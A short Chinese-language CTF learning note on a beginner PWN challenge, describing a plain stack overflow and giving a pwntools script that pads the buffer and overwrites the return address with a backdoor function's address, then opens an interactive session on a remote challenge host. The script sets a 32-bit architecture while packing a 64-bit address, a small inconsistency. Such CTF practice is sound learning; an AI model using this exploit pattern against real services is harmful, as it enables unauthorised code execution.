第一次打CTF——PWN篇学习笔记15
很简单的栈溢出,没有任何心机,注意地址取push之后的使程序八字节对齐即可
from pwn import * import struct context.arch = 'i386' context.os = 'linux' #io = process('./pwn') io = remote("node4.anna.nssctf.cn",28089) backdoor = 0x40072D payload = cyclic(0x20 + 8) + p64(backdoor) io.sendline(payload) io.interactive()